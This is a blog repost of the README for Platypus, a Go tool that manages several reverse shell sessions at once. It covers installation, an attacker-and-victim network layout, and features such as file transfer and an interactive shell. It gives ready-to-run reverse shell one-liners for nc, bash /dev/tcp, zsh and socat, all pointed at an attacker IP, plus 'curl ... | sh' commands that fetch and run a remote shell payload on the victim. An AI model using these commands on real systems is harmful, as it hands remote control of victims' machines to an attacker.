Total Pageviews

Friday, 2 October 2020

Platypus

  A modern multiple reverse shell sessions manager written in go.

Travis-CI GitHub stars GitHub license GitHub Release Downloads

A modern multiple reverse shell sessions/clients manager via terminal written in go.

Features

  •  Multiple service listening port
  •  Multiple client connections
  •  RESTful API
  •  Reverse shell as a service (Pop a reverse shell without remembering idle commands)
  •  Download/Upload file with progress bar
  •  Full interactive shell
    •  Using vim gracefully in reverse shell
    •  Using CTRL+C and CTRL+Z in reverse shell

Get Start

There are multiple ways to run this tool, feel free to choose one of the following method.

Run Platypus from source code

git clone https://github.com/WangYihang/Platypus
cd Platypus
go run platypus.go

Run Platypus from release binaries

  1. Download Platypus prebuild binary from HERE
  2. Run the downloaded executable file

Run Platypus from docker

// Build your docker image
docker build -t platypus .

// Start platypus from docker container, don't forget to create port mapping
docker run -it -p 9999:9999 platypus

Usage

Network Topology

  • Attack IP: 192.168.174.132
    • Reverse Shell Service: 0.0.0.0:8080
    • RESTful Service: 127.0.0.1:9090
  • Victim IP: 192.168.174.128

Connecting victim and attacker

As we all know, the using senanrio of reverse shell is about both attacker side and the victim side. Now we will seperate the usage guide into two views, the attacker's view and the victim's view.

Attacker's view

  1. First the attacker should start platypus and listen on some port (eg: 8080).

  1. Then the victim is attacked by the attacker and a reverse shell command will be executed on the machine of victim.

Victim's view

The victim machine will be hacked and execute the evil command to generate a reverse shell to attack.

Here are some reverse shell commands for various platform.

nc -e /bin/bash 192.168.174.132 8080
bash -c 'bash -i >/dev/tcp/192.168.174.132/8080 0>&1'
zsh -c 'zmodload zsh/net/tcp && ztcp 192.168.174.132 8080 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.174.132:8080

Controlling the victim

List all victims

Select a victim

Interactive shell

Download file

Upload file

Other useful feature

Reverse shell as a Service

USAGE

NOTICE: ONLY WORKS on *NIX

The command bash -c "bash -i >/dev/tcp/8.8.8.8/1337 0>&1" is the equivalent of curl http://192.168.174.132:8080/8.8.8.8/1337 | sh, this feature provides the capability to redirect new reverse shell to another ip and port with out type the boring reverse shell command.

If you just want to pop up a reverse shell to the listening port of platypus, the parameter (8.8.8.8/1337) can be omited, like this:

curl http://192.168.174.132:8080/ | sh

Once the command get executed, the reverse shell session will appear in platypus which is listening on 192.168.174.132:8080.

RESTful API

USAGE

Demonstration is to be done.

Using VIM in Reverse Shell (Only on Linux)

Demonstration is to be done.

Other Materials

from https://github.com/WangYihang/Platypus
Posted by at
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)